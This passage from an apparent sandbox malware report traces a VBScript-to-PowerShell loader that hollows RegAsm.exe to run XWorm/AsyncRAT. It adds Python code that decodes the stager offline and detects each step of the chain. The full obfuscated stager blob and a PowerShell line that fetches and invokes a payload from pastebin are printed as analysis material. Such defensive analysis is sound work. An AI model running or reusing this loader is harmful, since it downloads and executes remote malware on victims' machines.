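The Target 12 command line above is a substitution-obfuscated loader: a UTF-16LE Base64 blob had every 'A' replaced with '?', and the script undoes that with .replace('?','A'), decodes it, swaps the %pzAcOgInMr% placeholder for the script's own path and runs the result, which is the Target 14 command line. The following is an added example (not Joe Sandbox output and not the sample's own code) that performs the same decode offline on the blob copied from the Target 12 line and pulls out the indicators an analyst would pivot on: the plaintext pastebin URL, the reversed HTTPS URL handed to the loaded assembly, the type and method invoked by reflection, the placeholder, and the certificate-validation bypass. The function names, indicator keys and regular expressions are the example's own.

```python
"""Decode the '?'-for-'A' Base64 stager from the sostener.vbs chain.

Added example for this report. STAGER_BLOB is the $LoPuennnTes value copied
from the Target 12 command line; the decoder mirrors what the stager does to
itself: replace('?','A') -> FromBase64String -> [Text.Encoding]::Unicode.
"""
import base64
import re

STAGER_BLOB = "".join("""
J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?
UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?
FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?
Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?
C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?
C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?
QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?
d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?
LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?
""".split())


def deobfuscate_stager(blob: str, substitute: str = "?", original: str = "A") -> str:
    """Undo the character substitution, Base64-decode, read as UTF-16LE."""
    b64 = blob.replace(substitute, original)
    b64 += "=" * (-len(b64) % 4)  # tolerate a blob trimmed during copy/paste
    return base64.b64decode(b64).decode("utf-16-le")


def resolve_placeholders(script: str, mapping: dict) -> str:
    """Mirror the stager's $KByHL.replace('%pzAcOgInMr%', <script path>) step."""
    for token, value in mapping.items():
        script = script.replace(token, value)
    return script


def reverse_url(token: str) -> str:
    """The loader receives its C2 URL reversed ('//:sptth' == 'https://')."""
    return token[::-1]


def extract_indicators(script: str) -> dict:
    """Pull the pivot points out of the decoded PowerShell (keys are this example's own)."""
    type_match = re.search(r"GetType\('([^']+)'\)", script)
    method_match = re.search(r"GetMethod\('([^']+)'\)", script)
    return {
        "urls": re.findall(r"https?://[^'\"\s)]+", script),
        "reversed_urls": [reverse_url(t) for t in re.findall(r"'([^']*//:s?ptth)'", script)],
        "loaded_type": type_match.group(1) if type_match else None,
        "invoked_method": method_match.group(1) if method_match else None,
        "placeholders": re.findall(r"%[A-Za-z0-9_]+%", script),
        "disables_cert_validation": bool(re.search(
            r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", script)),
    }


if __name__ == "__main__":
    decoded = deobfuscate_stager(STAGER_BLOB)
    print(decoded)
    for key, value in extract_indicators(decoded).items():
        print(f"{key}: {value}")
```

The decoder deliberately never executes anything: the stager's own `powershell $KByHL` step is replaced by printing the plaintext, and the two pastebin URLs are recovered as strings for blocking or pivoting rather than fetched. Note that the forward URL is the first hop only; the Target 14 line shows it is fetched twice (`DownloadString(DownloadString(...))`), so the first paste holds a URL and the second holds the Base64 assembly.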

                                                            Target ID:15
                                                            Start time:00:53:29
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:00:53:34
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x9e0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            Has exited:true

                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2312711692.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ff848e70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 74e4a02f44bf7c5992a080c9be1fc7c96fd609f2ef856c70fdf68f16b12d8372
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: E601677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3651D736E882CB45

                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:23
                                                              Total number of Limit Nodes:1
                                                              execution_graph (node/edge listing of a rendered graph; only the API call nodes are recoverable as text):
                                                              • 7ff848e59d3b WriteProcessMemory, reached from 7ff848e59d2d
                                                              • 7ff848e5961e CreateProcessW, reached from 7ff848e595a9
                                                              • 7ff848e59837 Wow64SetThreadContext, reached from 7ff848e59829
                                                              • 7ff848e59f27 ResumeThread, reached from 7ff848e59f19
                                                              • 7ff848e59e19 WriteProcessMemory, reached from 7ff848e5622b and from 7ff848e56201
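The process list and the execution_graph above together describe the chain: PowerShell copies the script into the user's Temp folder and relaunches it hidden through wscript.exe //b, a Base64-substitution stager decodes into a second PowerShell that disables certificate validation, fetches a .NET assembly through two pastebin hops and invokes it with a reversed URL, and finally RegAsm.exe is started without arguments and written into with CreateProcessW, WriteProcessMemory, Wow64SetThreadContext and ResumeThread. The following is an added example (not Joe Sandbox output and not vendor rule content) showing behavioural checks that would catch each step, run over process-creation events constructed from the command lines listed above. The PIDs, the parent links (inferred from start-time order), the abbreviated command lines for Targets 12 and 14, and the API trace built from the execution_graph nodes are the example's assumptions.

```python
"""Behavioural checks for the sostener.vbs execution chain in this report.

Added example. Events are constructed from the Target 5/9/11/12/14/16 command
lines; PIDs and parent links are hypothetical, and the Target 12 / 14 command
lines are abbreviated to their characteristic fragments.
"""
import re
from dataclasses import dataclass

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"


@dataclass
class ProcEvent:
    pid: int        # hypothetical, reuses the report's Target ID
    ppid: int       # hypothetical parent, inferred from start-time order
    image: str
    cmdline: str


EVENTS = [
    ProcEvent(5, 1, PS, r"powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' "
                        r"-Destination 'C:\Users\user\AppData\Local\Temp\'"),
    ProcEvent(9, 5, PS, '"' + PS + '" -WindowStyle hidden -command wscript.exe //b //nologo '
                        r"'C:\Users\user\AppData\Local\Temp\sostener.vbs'"),
    ProcEvent(11, 9, WSCRIPT, r'"C:\Windows\system32\wscript.exe" //b //nologo '
                              r"C:\Users\user\AppData\Local\Temp\sostener.vbs"),
    ProcEvent(12, 11, PS, '"' + PS + "\" -command $LoPuennnTes = 'J?Bh?G0?cwBo...';"  # blob abbreviated
                          "$KByHL = [system.Text.Encoding]::Unicode.GetString( "
                          "[system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );"
                          "powershell $KByHL;"),
    ProcEvent(14, 12, PS, '"' + PS + "\" \"$amshe = '03';"  # abbreviated
                          "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
                          "[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient)"
                          ".DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );"
                          "...Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth', $vverr))\""),
    ProcEvent(16, 14, REGASM, '"' + REGASM + '"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TEMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\[^\s'\"]+\.(?:vbs|vbe|js|jse|wsf|ps1)\b", re.I)
HIDDEN_HOST = re.compile(r"\b[wc]script(?:\.exe)?\s+//b\b", re.I)
B64_SUBST = re.compile(r"FromBase64String\(.*?\.replace\(", re.I | re.S)
CERT_BYPASS = re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)
REVERSED_URL = re.compile(r"//:s?ptth")
REGASM_NO_ARGS = re.compile(r'"?[^"]*\\regasm\.exe"?\s*', re.I)  # RegAsm normally takes an assembly path


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent, by_pid: dict) -> list:
    """Return the names of the checks (this example's own) that fire for one event."""
    img = basename(ev.image)
    parent = by_pid.get(ev.ppid)
    pimg = basename(parent.image) if parent else ""
    hits = []
    if img in SCRIPT_HOSTS and TEMP_SCRIPT.search(ev.cmdline):
        hits.append("script_host_from_temp")
    if img == "powershell.exe" and HIDDEN_HOST.search(ev.cmdline):
        hits.append("powershell_launches_hidden_script_host")
    if img == "powershell.exe" and B64_SUBST.search(ev.cmdline):
        hits.append("base64_with_char_substitution")
    if CERT_BYPASS.search(ev.cmdline):
        hits.append("tls_validation_disabled")
    if REVERSED_URL.search(ev.cmdline):
        hits.append("reversed_url")
    if img == "regasm.exe" and REGASM_NO_ARGS.fullmatch(ev.cmdline) and pimg == "powershell.exe":
        hits.append("regasm_no_args_from_powershell")
    return hits


def scan(events) -> dict:
    by_pid = {e.pid: e for e in events}
    return {e.pid: check_event(e, by_pid) for e in events}


# Process hollowing as seen in the execution_graph: create suspended, overwrite, repoint, resume.
HOLLOWING_SEQUENCE = ("CreateProcessW", "WriteProcessMemory", "Wow64SetThreadContext", "ResumeThread")
API_TRACE = ["CreateProcessW", "WriteProcessMemory", "WriteProcessMemory",
             "Wow64SetThreadContext", "ResumeThread"]  # constructed from the graph's API nodes


def is_hollowing_sequence(calls, required=HOLLOWING_SEQUENCE) -> bool:
    """True when every call in `required` appears in `calls` in that order, gaps allowed."""
    it = iter(calls)
    return all(any(call == want for call in it) for want in required)


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits or "-")
    print("hollowing sequence:", is_hollowing_sequence(API_TRACE))
```

The RegAsm check is the one most likely to be missed by signature-only tooling: a legitimate RegAsm.exe invocation carries an assembly path, so a bare `"RegAsm.exe"` spawned by PowerShell is itself the anomaly, before any memory write happens. The API-sequence check is written as an ordered subsequence rather than a contiguous match so that the repeated WriteProcessMemory calls in the graph do not break it.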
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N_H$!
                                                              • API String ID: 0-3136906785
                                                              • Opcode ID: bdde106e13fd6defd769663327b5928b8cac0c4907052deaec6c556592e91324
                                                              • Instruction ID: 16a2a30afd09c354ee13e27c03d133481a0d15c74840e4eb5d1e5ebdb8cdcc4e
                                                              • Opcode Fuzzy Hash: bdde106e13fd6defd769663327b5928b8cac0c4907052deaec6c556592e91324
                                                              • Instruction Fuzzy Hash: 56E26632E0EA894FE79AA76C68151B47BE1EF56250F0801FBD04DC71D3DE19AC46C39A

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 860d3214ceb637d1a6ab49e196c59add7edc9ce9238ec53e0d23dc75a9928cc6
                                                              • Instruction ID: 23e900afec3da0103ffaf2b7951b549e095917e0d5dcad200e7975cf229084e8
                                                              • Opcode Fuzzy Hash: 860d3214ceb637d1a6ab49e196c59add7edc9ce9238ec53e0d23dc75a9928cc6
                                                              • Instruction Fuzzy Hash: E99216B0909A598FDB9AEF28C8547A9B7F1FF59340F5041EAD00DE7292CA385A80CF55
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f43db321b964bebf021f6a347d4fcdda7bf213474f8efd13b66ffa2f423c5120
                                                              • Instruction ID: bdfbee82c34061ec835ae41c4f932d9bd82796e1393cf5343bc30d114b5297f8
                                                              • Opcode Fuzzy Hash: f43db321b964bebf021f6a347d4fcdda7bf213474f8efd13b66ffa2f423c5120
                                                              • Instruction Fuzzy Hash: 193139B0D08A598FDB9ADF18C890BA9B7F1FF59340F1001EE910DE7291CB756A808F45

                                                              Control-flow Graph

                                                              control_flow_graph for the function at 7ff848f20061-7ff848f209a8 (rendered graph; blocks coloured executed / not executed; no API calls in this function)
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @+H
                                                              • API String ID: 0-1643726030
                                                              • Opcode ID: 7ebc4745b60e9094537c004a633c369f14a066e34f8e72182cd8fc1237bc2e53
                                                              • Instruction ID: 799dfa407ef03cef6f9a4c1207337145a5a96cc80a7cadaa2bbd94014567f39d
                                                              • Opcode Fuzzy Hash: 7ebc4745b60e9094537c004a633c369f14a066e34f8e72182cd8fc1237bc2e53
                                                              • Instruction Fuzzy Hash: F7722332A0EBC94FE35ABB2868555717BE1EF96250F0801FFD449CB1E3DA19AC06C356

                                                              Control-flow Graph

                                                              control_flow_graph for the function at 7ff848e59d2d-7ff848e59f16 (rendered graph; blocks coloured executed / not executed); API call: WriteProcessMemory in block 7ff848e59e19-7ff848e59eb2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: f0cf2df8d344406ecae48c2a7c9924ee4fccca2bedfa8622bf7e14e380cb5724
                                                              • Instruction ID: 4e78f21d34728b6b33278c5659d7979e8afe09af313911643e935c9bfed6c852
                                                              • Opcode Fuzzy Hash: f0cf2df8d344406ecae48c2a7c9924ee4fccca2bedfa8622bf7e14e380cb5724
                                                              • Instruction Fuzzy Hash: 19612370908A5C8FDB98EF98D884BE9BBF1FB69311F1041AED04DE3251DB74A985CB44

                                                              Control-flow Graph

                                                              control_flow_graph for the function at 7ff848e5622b-7ff848e56256, calling into 7ff848e59d50-7ff848e59f16 (rendered graph; blocks coloured executed / not executed); API call: WriteProcessMemory in block 7ff848e59e19-7ff848e59eb2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 248eb57e991b96a4be8739b1cdf4fc1ca06f2eaa86ea464449be6ae4eb2c4e48
                                                              • Instruction ID: 3a9e7ed19bae4a8a50271ad353bab96cb06f814c1e5fc982253edac3159005d9
                                                              • Opcode Fuzzy Hash: 248eb57e991b96a4be8739b1cdf4fc1ca06f2eaa86ea464449be6ae4eb2c4e48
                                                              • Instruction Fuzzy Hash: A8510370908A5C8FDB98EF98D885BE9BBF1FB69301F1041AED04DE3251DB74A985CB44

                                                              Control-flow Graph

                                                              control_flow_graph 555 7ff848e59829-7ff848e59835 556 7ff848e59837-7ff848e5983f 555->556 557 7ff848e59840-7ff848e598f4 555->557 556->557 560 7ff848e59916-7ff848e5997f Wow64SetThreadContext 557->560 561 7ff848e598f6-7ff848e59913 557->561 562 7ff848e59987-7ff848e599d1 560->562 563 7ff848e59981 560->563 561->560 563->562
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 4c3b318dae27b37f6638ead1441fdae1fe14fda556ff1947e8b9555e3ffd93dc
                                                              • Instruction ID: 395ae3a6646c8f0e9b6d71bd04b238e41e8f0b1792592983fb84589964ea7b55
                                                              • Opcode Fuzzy Hash: 4c3b318dae27b37f6638ead1441fdae1fe14fda556ff1947e8b9555e3ffd93dc
                                                              • Instruction Fuzzy Hash: 81518F70D08A4D8FDB59EFA8D884BE9BBF1FB66311F1482AAD048D7255C7749885CF40

                                                              Control-flow Graph

                                                              control_flow_graph 565 7ff848e595a9-7ff848e595b6 566 7ff848e5961e-7ff848e596ae CreateProcessW 565->566 567 7ff848e595b8-7ff848e5961d 565->567 568 7ff848e596b6-7ff848e597a4 call 7ff848e597a5 566->568 569 7ff848e596b0 566->569 567->566 569->568
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 4d7a2c02fb930cd406bbca812077e7a20306f280838bae9954c934bb1645dcde
                                                              • Instruction ID: 033972628d95d39e05f91a2af4f5759e9958c0b8749a68b5127869269b5f7fcd
                                                              • Opcode Fuzzy Hash: 4d7a2c02fb930cd406bbca812077e7a20306f280838bae9954c934bb1645dcde
                                                              • Instruction Fuzzy Hash: 3F51F770908A1D8FDBA8EF18D894BE9B7F1FB59310F1001AAD40DE3291DB35AA85CF45

                                                              Control-flow Graph

                                                              control_flow_graph 646 7ff848e59f19-7ff848e59f25 647 7ff848e59f27-7ff848e59f2f 646->647 648 7ff848e59f30-7ff848e59ffa ResumeThread 646->648 647->648 651 7ff848e59ffc 648->651 652 7ff848e5a002-7ff848e5a040 648->652 651->652
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2277773210.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 6f38f2764b13a21831231deeaabda1c576b175d978e6c12c35d67f7ccb44dc85
                                                              • Instruction ID: 1975dc2cd1d461fef22dccedb1e23871a831a9c0ecc946229e4cb9f981f27334
                                                              • Opcode Fuzzy Hash: 6f38f2764b13a21831231deeaabda1c576b175d978e6c12c35d67f7ccb44dc85
                                                              • Instruction Fuzzy Hash: 3D414A7090C64C8FDB59DF98D885BE9BBB0FB5A310F1441AED049E7252DB74A885CB41

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cd8efd4a34ceb41648868bb8c6bdacc1eed02b98840604b3c73a1f9e71f16c0
                                                              • Instruction ID: e6729837573ca9feff87c2ba2a810ed39aa473838b7125f823c340ecb1f8b68d
                                                              • Opcode Fuzzy Hash: 1cd8efd4a34ceb41648868bb8c6bdacc1eed02b98840604b3c73a1f9e71f16c0
                                                              • Instruction Fuzzy Hash: A2511532A1DA855FE358B72CA85A531BBD1EFD5750F1801BEE448C72D3EE15AC02838A

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f598db96c5f53d909aac0592adcb7070a852e28713a485747c74106accc4311
                                                              • Instruction ID: 0fc1075a6be1d606af0c0068cbf165deb94c2902d6651430d531ec33e328c72c
                                                              • Opcode Fuzzy Hash: 0f598db96c5f53d909aac0592adcb7070a852e28713a485747c74106accc4311
                                                              • Instruction Fuzzy Hash: 63510332E1EE8A4FF7A9E7AC241167566D1FF457A0F5801BAD00AC71D3DE19BC444389

                                                              Control-flow Graph

                                                              control_flow_graph 962 7ff848f22241-7ff848f2228f 964 7ff848f22429-7ff848f22493 962->964 965 7ff848f22295-7ff848f2229f 962->965 990 7ff848f22494-7ff848f224d5 964->990 966 7ff848f222b9-7ff848f222bf 965->966 967 7ff848f222a1-7ff848f222af 965->967 970 7ff848f223be-7ff848f223c8 966->970 971 7ff848f222c5-7ff848f222c8 966->971 967->966 972 7ff848f222b1-7ff848f222b7 967->972 976 7ff848f223db-7ff848f22426 970->976 977 7ff848f223ca-7ff848f223da 970->977 974 7ff848f222ca-7ff848f222dd 971->974 975 7ff848f22311 971->975 972->966 974->964 988 7ff848f222e3-7ff848f222ed 974->988 979 7ff848f22313-7ff848f22315 975->979 976->964 979->970 981 7ff848f2231b-7ff848f2231e 979->981 981->970 986 7ff848f22324-7ff848f22327 981->986 986->970 989 7ff848f2232d-7ff848f2236b 986->989 991 7ff848f222ef-7ff848f22304 988->991 992 7ff848f22306-7ff848f2230f 988->992 989->970 1004 7ff848f2236d-7ff848f22373 989->1004 1010 7ff848f224e1-7ff848f224ed 990->1010 1011 7ff848f224d7-7ff848f224dd 990->1011 991->992 992->979 1005 7ff848f22392-7ff848f223a8 1004->1005 1006 7ff848f22375-7ff848f22390 1004->1006 1009 7ff848f223ae-7ff848f223bd 1005->1009 1006->1005 1012 7ff848f224f9-7ff848f2250b 1010->1012 1013 7ff848f224ef-7ff848f224f5 1010->1013 1011->1010 1012->990 1015 7ff848f2250d-7ff848f22574 1012->1015 1013->1012 1019 7ff848f225bb-7ff848f225c5 1015->1019 1020 7ff848f22576-7ff848f225b8 1015->1020 1021 7ff848f225d0-7ff848f2261b 1019->1021 1022 7ff848f225c7-7ff848f225cf 1019->1022 1020->1019
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1064103addcc84f11d8b3facfa93b77512c7a015bbb237e4248a97f9bf5d2192
                                                              • Instruction ID: f2bf1c374ba4fec4d8fb66a5a0ff20612b443ad4f4afc1236a342f45dfefb43e
                                                              • Opcode Fuzzy Hash: 1064103addcc84f11d8b3facfa93b77512c7a015bbb237e4248a97f9bf5d2192
                                                              • Instruction Fuzzy Hash: C7514631D1DA894FE7A9EF68A851138B7E1EF96350F0805BED44DC71D3DB26AC118386
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c243a896b81483ba7429f010881a6788621e7d3427dd5372fe48fbd34ffb3e9
                                                              • Instruction ID: 7fac778fdfc5db1532f2c2493a588db8a41b67c4323fc71825fede3b0e15e481
                                                              • Opcode Fuzzy Hash: 0c243a896b81483ba7429f010881a6788621e7d3427dd5372fe48fbd34ffb3e9
                                                              • Instruction Fuzzy Hash: 1441D432E1EE874FF3AAA7AC245627965D1EF516A1F5801F9D00EC31D2EF0EA884430D

                                                              Control-flow Graph

